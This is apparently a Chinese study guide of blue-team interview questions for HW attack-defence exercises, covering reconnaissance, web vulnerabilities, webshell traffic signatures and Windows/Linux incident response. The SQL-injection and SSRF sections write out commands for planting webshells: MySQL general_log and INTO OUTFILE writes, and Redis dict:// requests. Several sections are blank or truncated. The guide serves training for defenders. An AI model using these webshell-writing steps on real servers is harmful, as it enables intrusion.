马丁的丁

护网蓝队面试题

护网面试有很多步骤

1、投递简历-安全服务公司HR先筛选一下简历，交给技术负责人面试一下，推荐给安全厂商（360、奇安信、安恒、绿盟）

2、安全设备厂商HR筛选一下简历，安全设备厂商安排技术笔试和面试（技术负责人和项目负责人筛选和面试）。

3、面试通过，安全设备厂商安排项目地是甲方公司（如某银行，某证券公司等），甲方客户也有可能需要面试一下技术、查看健康码，有的甲方要求７天行程码在当地等。

是否参加过护网？

1、护网面试岗位监控岗、研判岗、应急和溯源岗位等。分为初级、中级、高级岗位。

2、根据甲方需求，分为 3 组：监测组、处置组、应急保障和溯源反制组。

3、监测组主要监测设备，监控判断不出来告警，交给研判，若确认未成功的真实攻击，提交ip和告警截图给处置组封禁ip，若需要应急，需提交给处置单给应急人员；

4、处置组，封禁ip以及甲方自有人员自有设备处置；

5、应急保障和溯源反制组，应急拿到处置单，先和处置组建群沟通，根据处置单，提出处置建议，让处置组操作或者客户授权后操作；溯源根据提供的攻击ip和钓鱼邮件进行溯源和反制

信息收集篇

信息收集什么？

服务器：操作系统，IP，数据库类型
网站：CMS，Web容器，CDN，旁站，C段信息
域名：子域名，公司名称，注册人，社工信息
具体站点：目录扫描，端口扫描，漏洞扫面

判断目标操作系统的方法

大小写（Win大小写不敏感，Linux敏感）
ping命令：TTL值在默认情况下win是128，Linux是64.
nmap -O IP值：可以查出

怎么修改TTL值？

在安全加固中，需修改TTL。

怎么验证是否绕过CDN

使用多地ping的服务，查看对应IP地址是否唯一，如果不唯一大概率就是存在CDN
使用nslookup命令检测，查看返回域名解析对应IP地址是否唯一，如果不唯一很可能存在CDN
工具：站长工具：http://ping.chinaz.com/
爱战网：https://ping.aizhan.com/
国外ping探测：https://asm.ca.com/en/ping.php

怎么绕过CDN获取真实IP

子域名查询：
历史DNS解析：
国外主机解析域名：
网站漏洞：
邮件信息：
SSL证书：

如何验证找到的IP为真实IP

直接访问IP，看看响应页面是否和访问的域名一样。

探查网站的CMS有什么意义？

查找已曝光的漏洞。
如果开源，还能下载相应的源码进行代码审计。
根据CMS特征关联同CMS框架站点，进行敏感备份文件扫描，有可能获得站点备份文件。

旁站信息收集的意义和方法。

旁站就是与目标网站处于同一服务器的不同网站，在目标网站无法攻陷的情况下，渗透旁站，拿到该服务器的最高权限就可将目标网站拿下。
方法
站长工具输入IP值
bing搜索引擎查询（语法：ip:xxx.xxx.xxx.xxx）
使用fofa（语法：ip=“xxx.xxx.xxx.xxx”）

C段主机信息收集的意义与方法

C段信息的收集的目的是获取与目标相关联的更多设备的信息（原理和旁站差不多）
方法：

nmap扫描C段主机：nmap -sn ip/24
搜索引擎：site:xxx.xxx.xxx.*
webfinder
fofa: ip=“xxx.xxx.xxx.0/24”

子域名信息收集的意义与方法

原理与旁站，C段类似，主站攻不下，去搜索其子域名，可能防御没那么厉害。

枚举
搜索引擎
fofa
透明证书:https://crt.sh/
聚合工具：oneforall

端口信息收集的方法与常见的端口

Nmap:namp -sv -p 1-65535 ip值
御剑
Masscan
zmap
常见端口
FTP 20 FTP服务器真正传输所用的端口，用于上传、下载
FTP　　　 21 用于FTP的登陆认证
SSH、SFTP 22 加密的远程登录，文件传输
Telnet 23 远程登录（在本地主机上使用此端口与远程服务器的22/3389端口连接）
SMTP 25 用于发送邮件
DNS 53 域名解析
HTTP 80 用于网页浏览
MySQL 3306 数据库
HTTPS 443 加密的网页浏览端口
TOMCAT 8080 WWW代理开放此端口
redis 6379
远程桌面连接 3389
SQLserver 1433

数据包有哪些请求方式

常用八种请求方式，分别是 GET、POST、HEAD、PUT、DELETE、OPTIONS、TRACE、 CONNECT，get 和 post 最常用

get请求与post请求的区别

数据传输位置：get在URL,POST不在url
数据长度：get有上限，post无上限
安全性：get有风险，post相对更安全
语义：get请求通常用于获取或检索资源，不对服务器产生影响
post请求用于提交数据给服务器，会对服务器数据库产生影响

漏洞篇

OWASP top10

1.失效的访问控制
2.加密机制失效
3.注入（包括跨站脚本攻击XSS和SQL注入等）
4.不安全设计
5.安全配置错误
6.自带缺陷和过时的组件
7.身份识别和身份验证错误
8.软件和数据完整性故障
9.安全日志和监控故障
10.服务端请求伪造SSRF

SQL注入篇

SQL注入的原理以及发生前提

SQL注入原理：
在数据交互中，前端的数据传入到后台进行处理时，没有做严格的判断，过
滤。导致传入的“数据”拼接到SQL语句中后，被当作SQL语句的一部分执
行。从而导致数据库受损（被脱裤、数据被删除、甚至整个服务器权限沦陷
）
漏洞产生原因（实现条件）：
用户对sql查询语句参数可控
原本程序要执行的SQL语句,拼接了用户输入的恶意数据

SQL注入的类型

1.联合注入
2.堆叠注入
3.宽字节注入
4.cookie注入
5.XFF头注入
6.UA注入（user-agent注入）
7.Referer注入
8.二次注入
9.base64注入
10.万能密码
1.文件读写
盲注类型：
1.基于时间的盲注 sleep() benchmark()
2.基于布尔的注入
3.基于报错的注入
updatexml() extractvalue() floor() exp()

防御SQL注入

使用参数化查询或预编译语句：

使用参数化查询（也称为绑定参数或预编译语句）。参数化查询使用占位符（例如问号或冒号）来表示查询中的变量，然后通过参数绑定的方式将用户提供的数据与查询语句分开。这样可以防止用户输入被错误地解释为SQL代码。

输入验证和过滤：

过滤可以去除或转义输入中的特殊字符，以防止它们被错误地解释为SQL代码。可以使用正则表达式或内置的验证函数来验证输入数据，并使用转义函数或安全的编码机制来过滤特殊字符。

最小权限原则：

为应用程序连接数据库的账户分配最低限度的权限，只提供执行必要操作的权限。

不信任外部数据：

对于从外部来源获取的数据（例如用户输入、API调用等），应该始终将其视为不可信任的，并进行适当的验证和处理。不要直接将外部数据拼接到SQL查询中，而是使用参数化查询或预编译语句。

使用安全的编程实践：

遵循安全的编程实践，如不在应用程序中直接拼接SQL查询、避免动态拼接查询字符串、避免使用可执行字符串的函数等。

SQL注入的WAF绕过方法

1.大小写绕过注入
2.双写绕过注入
3.编码绕过注入
4.内联注释绕过注入

SQL注入的危害

1.获取数据库数据
数据库中存放的用户的隐私信息的泄露，脱取数据库中的数据内容（脱库），可获取网站管理员帐号、密码悄无声息的进行对网站后台操作等。
2.网页篡改
通过操作数据库对特定网页进行篡改，严重影响正常业务进行与受害者信誉。
3.网页挂马
将恶意文件或者木马下载链接写入数据库，修改数据库字段值，进行挂马攻击。
4.篡改数据库数据
攻击数据库服务器，篡改或者添加普通用户或者管理员帐号。
5.获取服务器权限
列取目录、读取、写入shell文件获取webshell，远程控制服务器，安装后门，经由数据库服务器提供的操作系统支持，让攻击者得以修改或控制操作系统。

宽字节注入原理

由于PHP utf-8编码数据库GBK编码，PHP发送请求到mysql时经过一次gbk编码，因为GBK是双字节编码，所以我们提交的%df这个字符和转译的反斜杠组成了新的汉字，然后数据库处理的时候是根据GBK去处理的，然后单引号就逃逸了出来。

SQL注入如何写入webshell

条件：

1、知道web绝对路径

2、有文件写入权限(一般情况只有ROOT用户有)

3、数据库开启了secure_file_priv设置

    然后就能用select into outfile写入webshell

查看secure_file_priv的状态，命令：show VARIABLES like ‘%secure%’ 查看是否有文件读取权限。
查看当前用户是否有File权限
当secure_file_priv文件导出路径与web目录路径重叠，写入Webshell才可以被访问到。
知道网站目录的绝对路径
union select写入

union select '' into outfile 'web目录';

分隔符写入
当union无法使用时，还可以利用分隔符写入：

?id=1 INTO OUTFILE '物理路径' lines terminated by （）#

?id=1 INTO OUTFILE '物理路径' fields terminated by （）#

?id=1 INTO OUTFILE '物理路径' columns terminated by （）#

?id=1 INTO OUTFILE '物理路径' lines starting by （）#

log写入
新版本的mysql在my.ini中设置了导出文件的路径，无法再使用select into outfile来写入一句话木马，这时我们可以通过修改MySQL的log文件来获取webshell。

show variables like '%general%';                     #查看配置

set global general_log = on;                         #开启general log模式

set global general_log_file = '网站目录/shell.php';   #设置日志目录为shell地址

select ''                #写入shell

set global general_log=off;                          #关闭general log模式

然后就可以在网站目录下创建一个shell.php，里边有我们写入的一句话木马

打开执行phpinfo

XSS篇

xss的原理和类型

原理：XSS，即跨站脚本攻击，是指攻击者利用Web服务器中的代码漏洞，在页面中嵌入客户端脚本（通常是一段由JavaScript编写的恶意代码），当信任此Web服务器的用户访问Web站点中含有恶意脚本代码的页面，用户浏览器会自动加载并执行该恶意代码，从而达到攻击的目的。

类型

XSS的危害与防御

危害：窃取受害者的敏感信息、绕过访问控制、利用受害者的身份进行攻击、篡改网页内容、发起钓鱼攻击等等。窃取cookie，抓取屏幕截图获取键盘记录，重定向，植入广告，恶意链接网页钓鱼，网页挂马，结合网页挂马或者其他工具(Metasploit)获取服务器或者操作系统权限。
防御：对用户输入进行严格的过滤和验证、采用安全的编程语言和框架、使用安全的API和库函数、使用HTTP-only Cookie、限制用户输入等等。此外，还可以使用一些安全工具和技术来检测和防御XSS漏洞，例如：Web应用程序防火墙（WAF）、安全编码规范和审计、反射性XSS漏洞检测等等。

CSRF漏洞

CSRF漏洞原理

CSRF(Cross -Site Request Forgery ),跨站请求伪造攻击，通常缩写为CSRF或者XSRF , 是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS)，但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装成受信任用户请求受信任的网站

CSRF漏洞分类

GET型
POST型

CSRF漏洞的危害

盗取用户敏感信息，如登录信息、支付信息等。
非法修改用户数据，如发表恶意言论、篡改个人资料等。
执行任意操作，如利用受害者账号进行网络攻击等

CSRF漏洞的防御

使用CSRF Token机制，将随机生成的Token与表单、链接等操作绑定，使攻击者无法伪造请求。
增加足够的身份验证机制，如密码、短信验证等，减少攻击者利用受害者身份的可能性。
使用HTTP Referer验证，判断请求来源是否合法。
避免使用GET方式提交表单，减少攻击者通过获取URL进行攻击的可能性。
对敏感操作进行二次确认，提示用户确认操作行为。

SSRF漏洞

SSRF漏洞原理

SSRF，服务器端请求伪造)是一种由攻击者构造形成由服务器发起请求的一个安全漏洞.(注意是服务器发起请求)
攻击场景：当攻击者想要访问服务器B上的服务，但是由于存在防火墙或者服务器B是属于内网主机等原因导致攻击者无法直接访问。如果服务器A存在SSRF漏洞，这时攻击者可以借助服务器A来发起SSRF攻击，通过服务器A向主机B发起请求，达到攻击内网的目的。

SSRF怎么结合Redis相关漏洞利用？

主要通过两种协议，dict协议和gopher协议。

dict协议利用redis相关漏洞：

探测端口：
ssrf.php?url=dict://x.x.x.x: $端口$ 利用burpsuite爆破端口
探测是否设置弱口令：
ssrf.php?url=dict://x.x.x.x:6379/info 已知端口利用info探测是否设置了密码
爆破密码：
ssrf.php?url=dict://x.x.x.x:6379/auth: $密码$ 利用burpsuite爆破密码
写入webshell：

1.  url=dict://xxx.xxx:6379/config:set:dir:/var/www/html   切换文件目录
2.  url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php   设置保存文件名
3.  url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"     //利用dict协议写入webshell   以上的字符编码是的十六进制
4.  url=dict://x.x.x.x:6379/save   保存
1.  url=dict://xxx.xxx:6379/config:set:dir:/var/www/html   切换文件目录
2.  url=dict://xxx.xxx:6379/config:set:dbfilename:webshell.php   设置保存文件名
3.  url=dict://xxx.xxx:6379/set:webshell:"\x3c\x3f\x70\x68\x70\x20\x70\x68\x70\x69\x6e\x66\x6f\x28\x29\x3b\x3f\x3e"

//利用dict协议写入webshell 以上的字符编码是的十六进制
4.ssrf.php?url=dict://x.x.x.x:6379/save 保存
dict协议利用计划任务反弹shell或者写入ssh公钥的手段类似

gopher协议利用redis未授权访问漏洞写入webshell：
常规利用步骤：
set x “\n\n\n\n\n\n”
config set dir /var/www/html
config set dbfilename shell.php
save
两次url编码后构造url：

//第一次url解码和第二次url解码
//同理其他类似计划任务反弹和写入ssh公钥等getshell方式相似

SSRF漏洞经常存在的位置？

分享：通过URL地址分享网页内容
转码服务
在线翻译
图片加载与下载：通过URL地址加载或下载图片
图片、文章收藏功能
未公开的api实现以及其他调用URL的功能

SSRF漏洞的危害

攻击者可以在服务器端内部网络中进行扫描和攻击。
向内部任意主机的任意端口发送payload来攻击内网服务
攻击内网的web应用，如直接SQL注入、XSS攻击等
攻击者可以通过向本地端口发送请求来绕过防火墙等网络安全设备。
攻击者可以利用SSRF漏洞进行钓鱼攻击、内网渗透等攻击。
DOS攻击（请求大文件，始终保持连接Keep-Alive Always）
利用file、gopher、dict协议读取本地文件、执行命令等
可以无视网站CDN

SSRF漏洞防御

禁止跳转
过滤返回的信息
如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
统一错误信息：避免用户可以根据错误信息来判断远程服务器的端口状态。
限制请求的端口：比如80,443,8080,8090。
禁止除HTTP和HTTPS外的协议：比如说仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://请求等引起的问题。
对请求地址设置白名单或者限制内网IP

XXE

XXE漏洞的原理及危害

如果Web应用的脚本代码没有限制XML引入外部实体，从而导致用户可以插入一个外部实体，并且其中的内容会被服务器端执行，插入的代码可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。

如何构建XXE攻击？

（1）直接通过DTD外部实体声明

]>

（2）通过DTD文档引入外部DTD文档，再引入外部实体声明

dtd文档内容：
（3）通过DTD文档引入外部实体声明


   %d;
]>

dtd文档内容：

XXE漏洞的防御

禁用外部实体的引入，比如：使用libxmldisableentity_loader（true）等方式。
过滤如SYSTEM等敏感关键字，防止非正常、攻击性的外部实体引入操作。

文件上传漏洞

文件上传漏洞的原理

文件上传漏洞是指用户上传了一个可执行的脚本文件，并通过此脚本文件获得了执行服务器端命令的能力。

文件上传漏洞的危害

上传webshell,控制服务器、远程命令执行
上传系统病毒、木马文件进行挖矿、僵尸网络
进行提权操作
修改web页面，实现钓鱼、挂马等操作。
进行内网渗透。

文件上传功能的监测点有哪些？

客户端的JS检测（主要检测文件名后缀）
服务端检测（MINE类型检测、文件后缀名、文件格式头）

文件上传漏洞的防御

文件上传漏洞常见上传点

图片上传：png,jpg.
文件上传:php
头像上传:
Flash上传:上传文件名:击者可以通过构造含有特殊字符的文件名来绕过服务器的检查，以实现攻击的目的。

文件上传漏洞的前提条件

文件包含漏洞

文件包含漏洞原理

服务器在解析动态页面时，将用户提交的输入作为参数传递给后台处理程序，如果没有对用户输入进行充分的过滤和验证，攻击者可以通过构造特殊的输入，让服务器包含恶意文件或者代码，进而实现攻击目的。

文件包含函数

PHP：Include()、Require()、Include_once()、Require_once()

文件包含漏洞分类

RCE远程代码执行

RCE漏洞原理

简称RCE，指攻击者能够在远程系统上执行恶意代码的一种攻击方式。攻击者通常利用漏洞，将恶意代码注入到受攻击的应用程序或操作系统中，从而实现在远程系统上执行任意代码的目的.——能执行任意代码导致它的危害非常高。
注意：RCE不同于其他漏洞，它更多的表示一种结果，其他漏洞导致了RCE的结果。

RCE漏洞成因

上述123前提都没有，依旧有可能发生RCE

常见编程语言执行函数

在编程语言中，有一些执行函数可能会带来安全风险，因为它们允许执行动态代码或系统命令。以下是一些常见编程语言中的执行函数和对应的语言名称：
Python:
eval(): Python的内置函数，用于执行字符串中的Python代码。
exec(): Python的内置函数，用于执行包含Python代码的字符串或代码对象。

JavaScript:
eval(): JavaScript的全局函数，用于执行包含JavaScript代码的字符串。

PHP:
shell_exec()
eval(): PHP的函数，用于执行包含PHP代码的字符串。
exec(): PHP的函数，用于执行系统命令。

Java:
Runtime.exec(): Java的类方法，用于执行系统命令。
ProcessBuilder: Java的类，用于创建进程并执行系统命令。

C#:
Process.Start(): C#的方法，用于执行系统命令。
System.Diagnostics.Process: C#的类，用于创建进程并执行系统命令。

Ruby:
eval(): Ruby的方法，用于执行包含Ruby代码的字符串。
system(): Ruby的方法，用于执行系统命令。

Go:
os/exec 包: Go的标准库中的包，用于执行系统命令。

Shell 脚本:
eval: 用于执行包含 Shell 脚本代码的字符串。
$(): 用于执行命令并返回输出。
这些函数和方法在正确使用的情况下是有用的，但在接受用户输入或不充分验证的情况下，它们可能导致安全漏洞。因此，在编写代码时，务必小心使用这些执行函数，并始终对用户输入进行充分验证和过滤，以防止潜在的安全风险。

RCE漏洞如何防御

RCE漏洞的危害

流量分析篇

CS是什么东西，知道怎么使用吗？

简介

CobaltStrike是一款渗透测试工具，被业界人称为CS。CobaltStrike分为客户端与服务端，服务端是一个，客户端可以有多个，可用于团队分布式协同操作。
功能

CobaltStrike 集成了端口转发，服务扫描，自动化溢出，多模式端口监听，windows exe 木马生成，windows dll 木马生成，java 木马生成，office 宏病毒生成，木马捆绑。钓鱼攻击等功能。
使用

一般使用步骤就是，先启动服务端，然后启动客户端连接获得一个可视化的界面，新建监听器来接收会话，生成木马文件(常见.exe可执行文件，office宏病毒，html应用程序类型的后门文件)，上传到受害者主机，当受害者运行该木马文件时目标主机就在CS上线了。
对比正常的http流量，CS的http通信流量具有以下几个特征：
A. 心跳包特征

a) 间隔一定时间，均有通信，且流级上的上下行数据长度固定；

B. 域名/IP特征

a) 未走CDN、域前置的，域名及IP暴露

b) 走CDN、域前置的，真实IP会被隐藏；

C. 指令特征

a) 下发指令时，通过心跳包接收指令，这时，server端返回的包更长，甚至包含要加载的dll模块数据。

b) 指令执行完后，client端通过POST请求发送执行的结果数据，body部分通过加密和base64编码。

c) 不同指令，执行的时间间隔不一样，可以通过POST请求和GET请求的间隔进行判断。

D. 数据特征

a) 在请求的返回包中，通信数据均隐藏在jqeury*.js中。

常见的webshell连接工具流量？

中国菜刀

连接过程中使用base64编码对发送的指令进行加密，其中两个关键payload z1 和 z2，名字都是可变的。

然后还有一段以QG开头，7J结尾的固定代码。

蚁剑

默认的user-agent请求头是antsword xxx，不过可以修改。

一般将payload进行分段，然后分别进行base64编码，一般具有像eval这样的关键字，然后呢大概率还有@ini_set(“display”,“0”);这段代码。

冰蝎

php代码中可能存在eval，assert等关键词，jsp代码中可能会有getclass()，getclassLoader()等字符特征。

冰蝎2.0

第一阶段请求中返回包的状态码是200，返回内容是16位的密钥。建立连接后的cookie格式都是Cookie：PHPSessid=xxxx ；path=/；特征。

冰蝎3.0

请求包中的conten-length字段是5740或者5720，然后请求头也具有特征信息，不过这个比较长，没有记住。

哥斯拉

1.jsp代码中可能会具有getclass，getclassLoader等关键字，payload使用base64编码等特征。php和asp则是普通的一句话木马。

2.在响应包的cache-control字段中有no-store，no-cache等特征。

3.所有请求中的cookie字段最后面都存在；特征。

webshell防御

1.建议用户通过ftp来上传、维护网页，尽量不安装asp的上传程序。

2.对asp上传程序的调用一定要进行身份认证，并只允许信任的人使用上传程序。

3.asp程序管理员的用户名和密码要有一定复杂性，不能过于简单，还要注意定期更换。

4.到正规网站下载程序，下载后要对数据库名称和存放路径进行修改，数据库名称要有一定复杂性。

5.要尽量保持程序是最新版本。

6.不要在网页上加注后台管理程序登陆页面的链接。

7.为防止程序有未知漏洞，可以在维护后删除后台管理程序的登陆页面，下次维护时再通过上传即可。

8.要时常备份数据库等重要文件。

9.日常要多维护，并注意空间中是否有来历不明的asp文件。

10.尽量关闭网站搜索功能，利用外部搜索工具，以防爆出数据。

11.利用白名单上传文件，不在白名单内的一律禁止上传，上传目录权限遵循最小权限原则。

对数据包或日志的分析思路？

用流量监测的安全设备，比如天眼，查看报文，分析报文里和 host 和网站目录路径，查看是否可疑，使用微步查询 host 是否为恶意，使用 wireshark 对数据包深度分析看一下请求的网站路径，源 IP 与目的 ip 地址，host 字段的值以及发包内容等。工具有 wearshark，网站的话微步在线。

如何区分扫描流量和手动流量？

扫描流量和手动流量的区别在于其产生的方式和行为特征，因此可以通过以下几种方法来查看区分它们：

查看流量来源：扫描流量通常是由自动化工具或蠕虫病毒等程序生成的，因此其源 IP或者发起请求的主机通常不固定，而手动流量则来自人工操作的设备，其请求的 IP 地址和用户代理信息都会有所不同。
检测流量频率和规律：扫描流量通常会呈现出周期性、规律性的访问行为，例如连续大量的 TCP SYN请求等。而手动流量则通常难以呈现出明显的规律和周期性。
观察流量的请求路径和参数：扫描流量通常是为了探测系统漏洞和弱点而产生的，它们通常会对一些已知的 URL和参数进行大量的尝试，并使用一些特殊的 HTTP 头部信息。而手动流量则更加多样化，可能会包含更丰富的请求路径和参数。
分析流量的响应状态码和长度：扫描流量通常会通过检测返回的状态码和页面长度等信息来判断目标是否存在漏洞或弱点。手动流量则通常会具有更加正常的响应状态码和页面长度。

总之，通过综合分析流量来源、访问规律、请求路径和参数以及响应状态码等特征，我们可以比较准确地区分扫描流量和手动流量，并采取相应的防御措施。

日志与流量分析？

日志和流量分析是网络安全领域中常用的两种技术。它们都可以帮助安全人员更好地了解系统的状态，检测和预防威胁。

日志分析是指对服务器、应用程序等产生的日志进行收集、存储、分析和处理，以便了解系统的运行状况和发现异常事件。通过对日志数据的统计和分析，可以追踪用户活动、系统错误、安全事件等，以及发现潜在的风险和漏洞。比如，通过分析登录日志可以检测到恶意登录尝试；通过分析访问日志可以了解网站的被攻击情况。

流量分析是指对网络流量进行收集、存储、分析和处理，以便了解网络连接的状态，检测和预防网络攻击。通过对流量数据的统计和分析，可以追踪网络通信、检测威胁和漏洞，比如检测恶意流量、DDoS攻击等。流量分析通常需要使用专业的工具和技术，包括网络协议分析、流量捕获和分析软件等。

综上所述，日志和流量分析是网络安全中非常重要的技术，它们可以帮助安全人员发现和解决潜在的安全问题，并维护系统和网络的正常运行。

权限维持和应急响应篇

怎么建立隐藏用户？

研判的思路？

1.首先对攻击的来源进行判断，是内对内，外对内还是内对外的情况。
2.依据设备的告警信息结合具体情况来分析攻击行为的类型，比如说告警SQL注入攻击，那我们就去查看一下请求数据包里面是否有单引号，SELECT等敏感字符，返回数据包里面是否有SQL语法报错等信息，有的话就可以初步判断该攻击行为是SQL注入攻击。
3.然后就是根据攻击特征来分析攻击行为使用了什么技术或者说工具，比如说攻击的频率，数据包的信息等等。比如说在使用AWVS或者APPSCAN等工具在扫描的时候，很有可能在请求数据包的user-agent里面就有相关的信息。同样结合告警信息和具体情况来判断攻击行为的危害程度，比如说检测到多条攻击成功告警和内对内及内对外攻击告警，这个时候就需要尽快的交给应急组了。
4.结合设备告警信息及具体情况分析攻击意图，比如说攻击者的目标是主站还是旁站，是主机还是域控，不同的攻击意图对于后续的处理也不同。
5.最后根据我们掌握的信息采取相应的处置方式，比如说告警信息是误报，说明设备需要策略优化，不需要处置。告警信息是尝试攻击，暂时对资产没有影响，就需要后续持续关注，攻击成功时能够做到及时上报。如果告警确认不是误报，并且攻击成功时，我们就需要迅速上报及时采取应急响应。

应急响应的思路？

简单版：Linux入侵排查思路; 1账号安全,2历史命令,3检查异常端口,4检查异常进程,5检查开机启动项,6检查定时任务,7检查服务,8检查异常文件,9检查系统日志。
1 检查系统账号安全2.检查异常端口、进程3.检查启动项、计划任务、服务
4.日志分析
（1. 日志中搜索关键字:如:union,select等
2. 分析状态码:

1xx information
200 successful
300 redirection
4xx client error
5xx server error
查找可疑文件,webshell
分析文件修改日期
系统日志分析）

收集信息：收集客户信息和中毒主机信息，包括样本
判断类型：判断是否是安全事件，何种安全事件，勒索、挖矿、断网、DoS 等等
抑制范围：隔离使受害⾯不继续扩⼤
深入分析：日志分析、进程分析、启动项分析、样本分析方便后期溯源
清理处置：杀掉进程，删除文件，打补丁，删除异常系统服务，清除后门账号防止事件扩大，处理完毕后恢复生产
产出报告：整理并输出完整的安全事件报告

windows应急响应时排查分析的相关细节？

答：

可疑账号排查 lusrmgr.msc

1.检查服务器是否有弱口令。比如空口令或者密码复杂度不够。

2.高危端口是否对外开放，比如SSH服务22端口，RDP服务3389端口等。

3.查看服务器是否有可疑账号。

手工方面：lusrmgr.msc命令查看用户和组，查看是否有新增账号，隐藏账号，克隆账号。
工具方面：比如利用D盾等工具来检测隐藏账号。
4.结合日志分析 eventvwr.msc 查看管理员登录时间，相关事件是否有异常。

敏感事件ID：

4624 登录成功
4625 登录失败
4672 使用超级管理员进行登录
4720 创建用户
5.使用query user查看当前系统的会话，比如查看是否有人使用远程登录服务器。

可疑进程和服务排查 taskmgr services.msc

1.查看CPU，内存，网络等资源是否有可疑状况。比如CPU占用率过高可能是中了挖矿病毒，磁盘空间大量占用可能是脚本或病毒大量生成和复制隐藏文件。

2.检查进程名

某些进程名是大量随机的情况，比如hrlC3.tmp、hrlD5.tmp、hrl6.tmp、hrlEE.tmp等多个名字相似的进程，基本上可以断定是异常进程。
异常进程名伪装成系统进程或者说常见服务的进程名，此时可以通过进程描述来判断，并且需要手工对比。
3.检查进程和服务描述，修改时间或者数字签名是否有异常。

4.利用工具进行检测，比如Process Hunter或者火绒剑等专门针对进程服务信息的排查分析工具，主要查看的是公司名，描述，安全状态和启动类型等方面来排查。

可疑启动项排查 msconfig

msconfig或者任务管理器中的启动项查看名称，发布者和启动影响，以及右键查看属性来看数字签名和修改时间。
结合工具进行排查，比如火绒剑等工具，会将启动项分类为登录，驱动程序，计划任务，映像劫持等，利用分析排查

可疑文件排查

1.各个磁盘的Temp/tmp目录中是Windows产生的临时文件，查看有无异常文件。

2.Recent目录会记录最近打开的文档以及程序的相关记录。

3.查看文件的创建时间，修改时间和访问时间，比如说攻击者利用菜刀等工具对文件进行修改会改变修改时间，如果修改时间在创建时间之前，那就是很明显的可疑文件。

4.windows系统我的电脑快速访问，可以看到最近使用的文件，比如说图片或者压缩包等文件的使用历史和文件路径都会显示。

恶意样本排查

1.恶意样本指的一般是webshell，病毒，木马或者后门程序或文件，可以根据设备的告警信息来查找相关路径，再排查相关的进程和启动项。

2.不知道路径的话可以利用相关的安全设备来进行检测，比如说通过D盾，河马查杀等工具对webshell可能存在的目录进行一个排查查杀，利用常规的防火墙软件来对全盘或者可疑目录扫描病毒。

常见的应急响应事件分类：

web入侵：网页挂马、主页篡改、Webshell
系统入侵：病毒木马、勒索软件、远控后门
网络攻击：DDOS攻击、DNS劫持、ARP欺骗

Windows应急响应常用命令？

查看账户：net user
查看隐藏账户：lusrmgr.msc
在Domains\Account\Users\Names下可以看到隐藏用户
登录时间查看：eventvwr.msc
查看Windows日志：链接: link
查看端口情况：netstat -ano
查看进程情况：tasklist|findstr “进程号”
杀死进程：taskkill /f /t /im httpd.exe
查看软件环境：msinfo32
查看启动项：【开始】——【所有程序】——【启动】、msconfig、
查看计划任务：
查看服务：services.msc
组策略：gpedit.msc
查找最近打开文件：%userprofile%\AppData\Roaming\Microsoft\Windows\Recent\
搜索恶意内容文件：findstr /m/i/s “eval” *.php、或者用everything、filelocator.
查找最新修改文件：使用everything 。everything—修改时间
查看系统版本以及补丁信息:

无法连接3389的情况？

a.3389端口处于关闭状态

b.远程桌面默认端口号已被修改

c.防火墙拦截

d.处于内网环境

e.超过了服务器最大连接数

f.管理员设置了权限，指定用户才能通过3389端口进行远程桌面访问

windowst入侵排查思路

1.检查系统账号安全

查看服务器是否有弱口令，远程管理端口是否对公网开放（使用netstat -ano命令、或者问服		务器管理员）

lusrmgr.msc命令查看服务器是否存在可疑账号、新增账号，如有管理员群组的	（Administrators）里的新增账户，如有，请立即禁用或删除掉

用 D 盾或者注册表中查看服务器是否存在隐藏账号、克隆账号

结合日志，查看管理员登录时间、用户名是否存在异常

检查方法：Win+R 打开运行，输入“eventvwr.msc”，回车运行，打开“事件查看器”，			导出 Windows 日志–安全，利用 Log Parser 进行分析

2.检查异常端口、进程

netstat -ano检查端口连接情况，是否有远程连接、可疑连接
任务管理器-进程

3.检查启动项、计划任务、服务

4.检查系统相关信息

查看系统版本以及补丁信息

查找可疑目录及文件

5.日志分析

如何查看系统内存shell？

先判断是通过什么方法注入的内存马，可以先查看 web 日志是否有可疑的 web 访问日志，如果是 filter 或者 listener 类型就会有大量 url 请求路径相同参数不同的，或者页面不存在但是返回 200 的，查看是否有类似哥斯拉、冰蝎相同的 url 请求，哥斯拉和冰蝎的内存马注入流量特征与普通 webshell 的流量特征基本吻合。通过查找返回 200 的 url 路径对比 web目录下是否真实存在文件，如不存在大概率为内存马。如在 web 日志中并未发现异常，可以排查是否为中间件漏洞导致代码执行注入内存马，排查中间件的 error.log 日志查看是否有可疑的报错，根据注入时间和方法根据业务使用的组件排查是否可能存在 java 代码执行漏洞以及是否存在过 webshell，排查框架漏洞，反序列化漏洞。

详细：
链接: link

linux登录日志查看文件？

linux 日志文件说明
日志默认存放位置：/var/log/
查看可登录的账户 cat/etc/passwd|grep ‘/bin/bash’
查看所有用户最后的登录信息 lastlog
查看用户最近登录信息 last 其中，/var/log/wtmp 存储登录成功的信息、btmp 存储登录失败的信息、utmp 存储当前正在登录的信息
查看当前用户登录系统情况 who

/var/log/message 系统启动后的信息和错误日志，是 Red Hat Linux 中最常用的日志之一

/var/log/secure 与安全相关的日志信息

/var/log/maillog 与邮件相关的日志信息

/var/log/cron 与定时任务相关的日志信息

/var/log/spooler 与 UUCP 和 news 设备相关的日志信息

/var/log/boot.log 守护进程启动和停止相关的日志消息

/var/log/wtmp 该日志文件永久记录每个用户登录、注销及系统的启动、停机的事件

普通的加固手段？

普通的加固手段包括以下几种：

更新补丁：定期更新操作系统、应用程序的补丁，修复已知的漏洞和安全问题。
强化口令策略：采用复杂、难以猜测的密码，并进行定期更换。同时可以启用账户锁定、多次失败尝试限制等功能，提高口令安全性。
加强身份验证：采用多因素身份验证技术，例如使用硬件令牌、生物特征等方式，确保只有授权用户才能访问系统。
安装防病毒软件：安装并及时更新防病毒软件，定期进行全盘扫描和实时监控，以便及时发现和处置潜在的恶意软件。
关闭不必要服务：关闭系统中不必要的服务和端口，降低攻击面，避免被利用。
限制访问权限：根据业务需要，设置合理的访问权限，对于未授权的用户或者设备进行限制，提高系统的安全性。
数据备份与恢复：定期备份重要数据，并将其存储在安全可靠的位置。在出现故障或事件时，能够快速恢复数据，避免数据丢失和系统停机。

